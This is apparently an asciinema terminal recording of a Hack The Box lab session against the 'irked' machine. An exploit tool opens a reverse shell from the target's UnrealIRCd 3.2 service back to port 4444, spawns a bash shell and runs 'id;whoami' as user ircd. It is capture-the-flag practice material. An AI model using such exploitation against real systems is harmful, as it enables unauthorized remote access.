[77.704697, "o", "\u001b[1;82r\u001b[82;1H\n\u001b[A\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Writing to socket B\r\n\u001b[K\u001b[1;83r\u001b[82;1H"]
[77.704931, "o", "\u001b[1;82r\u001b[82;1H\n\u001b[A\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Reading from sockets...\r\n\u001b[K\u001b[1;83r\u001b[82;1H"]
[77.742689, "o", "\u001b[1;82r\u001b[82;1H\n\u001b[A\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Reading from socket A\r\n\u001b[K\u001b[1;83r\u001b[82;1H"]
[77.742978, "o", "\u001b[1;82r\u001b[82;1H\n\u001b[A\u001b[34m\u001b[1m[*]\u001b(B\u001b[m A: \"fyeqr5ZxANc8Udqf\\r\\n\"\r\n\u001b[K\u001b[1;83r\u001b[82;1H"]
[78.314152, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:40 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[82;1H"]
[78.74493, "o", "\u001b[1;82r\u001b[82;1H\n\u001b[A\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Matching...\r\n\u001b[K\u001b[1;83r\u001b[82;1H"]
[78.745251, "o", "\u001b[1;82r\u001b[82;1H\n\u001b[A\u001b[34m\u001b[1m[*]\u001b(B\u001b[m B is input...\r\n\u001b[K\u001b[1;83r\u001b[82;1H"]
[79.313045, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:41 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[82;1H"]
[80.315825, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:42 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[82;1H"]
[81.31907, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:43 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[82;1H"]
[82.317599, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:44 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[82;1H"]
[83.321346, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:45 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[82;1H"]
[84.323663, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:46 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[82;1H"]
[84.95507, "o", "\u001b[1;82r\u001b[82;1H\n\u001b[A\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Command shell session 1 opened (10.10.14.17:4444 -> 10.10.10.117:53684 ) at 2022-09-10 05:13:46 +0800\r\n\u001b[K\u001b[1;83r\u001b[82;1H"]
[84.955764, "o", "\u001b[1;82r\u001b[82;1H\n\u001b[K\u001b[1;83r\u001b[82;1H"]
[85.325832, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:47 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[82;1H"]
[86.326121, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:48 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[82;1H"]
[87.325443, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:49 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[82;1H"]
[88.32787, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:50 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[82;1H"]
[89.330442, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:51 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[82;1H"]
[90.329151, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:52 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[82;1H"]
[91.040635, "o", "\u001b[1;82r\u001b[82;1H\n\u001b[K\u001b[1;83r\u001b[82;1H"]
[91.3299, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:53 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[82;1H"]
[91.5845, "o", "\u001b[1;82r\u001b[82;1H\n\u001b[K\u001b[1;83r\u001b[82;1H"]
[91.850509, "o", "s"]
[91.985483, "o", "h"]
[92.12843, "o", "e"]
[92.260707, "o", "l"]
[92.329687, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:54 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[82;5H"]
[92.399903, "o", "l"]
[92.474496, "o", "\u001b[1;82r\u001b[82;1H\n\u001b[K\u001b[1;83r\u001b[82;1H"]
[92.475254, "o", "\u001b[1;82r\u001b[82;1H\n\u001b[A\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Trying to find binary 'python' on the target machine\r\n\u001b[K\u001b[1;83r\u001b[82;1H"]
[92.672473, "o", "\u001b[1;82r\u001b[82;1H\n\u001b[A\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Found python at /usr/bin/python\r\n\u001b[K\u001b[1;83r\u001b[82;1H"]
[92.672773, "o", "\u001b[1;82r\u001b[82;1H\n\u001b[A\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Using `python` to pop up an interactive shell\r\n\u001b[K\u001b[1;83r\u001b[82;1H"]
[92.673549, "o", "\u001b[1;82r\u001b[82;1H\n\u001b[A\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Trying to find binary 'bash' on the target machine\r\n\u001b[K\u001b[1;83r\u001b[82;1H"]
[92.820591, "o", "\u001b[1;82r\u001b[82;1H\n\u001b[A\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Found bash at /bin/bash\r\n\u001b[K\u001b[1;83r\u001b[82;1H"]
[93.328161, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:55 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[82;1H"]
[94.33177, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:56 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[82;1H"]
[95.335471, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:57 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[82;1H"]
[96.334988, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:58 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[82;1H"]
[97.155473, "o", "\u001b[1;82r\u001b[82;1H\n\u001b[K\u001b[1;83r\u001b[82;1H"]
[97.32741, "o", "\u001b[1;82r\u001b[82;1H\n\u001b[K\u001b[1;83r\u001b[82;1H"]
[97.338216, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:59 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[82;1H"]
[97.86404, "o", "\u001b[1;82r\u001b[82;1H\n\u001b[K\u001b[1;83r\u001b[82;1H"]
[97.86436, "o", "ircd@irked:~/Unreal3.2$ \r"]
[97.864555, "o", "\u001b[1;82r\u001b[82;1H\n\u001b[K\u001b[1;83r\u001b[82;1H"]
[97.864715, "o", "ircd@irked:~/Unreal3.2$ "]
[98.337839, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:14:00 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[82;25H"]
[99.337028, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:14:01 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[82;25H"]
[100.120393, "o", "i"]
[100.242383, "o", "d"]
[100.337504, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:14:02 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[82;27H"]
[100.340487, "o", ";"]
[100.504428, "o", "w"]
[100.619529, "o", "h"]
[100.681682, "o", "o"]
[100.831699, "o", "a"]
[100.892581, "o", "m"]
[101.003586, "o", "i"]
[101.141477, "o", "\u001b[1;82r\u001b[82;1H\n\u001b[K\u001b[1;83r\u001b[82;1H"]
[101.18076, "o", "id;whoami\r"]
[101.181213, "o", "\u001b[1;82r\u001b[82;1H\n\u001b[K\u001b[1;83r\u001b[82;1H"]
[101.222658, "o", "\u001b[1;82r\u001b[1;1H\u001b[2S\u001b[80duid=1001(ircd) gid=1001(ircd) groups=1001(ircd)\r\nircd\u001b[K\r\nircd@irked:~/Unreal3.2$ \u001b[K\u001b[1;83r\u001b[82;25H"]
[101.338325, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:14:03 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[82;25H"]
[102.128004, "o", "\u001b[1;83r\u001b(B\u001b[m\u001b[?1l\u001b>\u001b[H\u001b[2J\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1003l\u001b[?1006l\u001b[?1005l\u001b[?7727l\u001b[?1004l\u001b[?1049l\u001b[23;0;0t"]
[102.128214, "o", "[detached (from session irked)]\r\n"]
[102.128571, "o", "\u001b[?2004h"]
[102.128603, "o", "\u001b]0;root@kali: ~/htb/irked\u0007\u001b[1;37m┌──(\u001b[1;34mroot💀kali\u001b[1;37m)-[\u001b[0;1m~/htb/irked\u001b[1;37m]\r\r\n\u001b[1;37m└─\u001b[1;34m#\u001b[0m "]
[103.44159, "o", "\u001b[?2004l\r\r\nexit\r\n"]
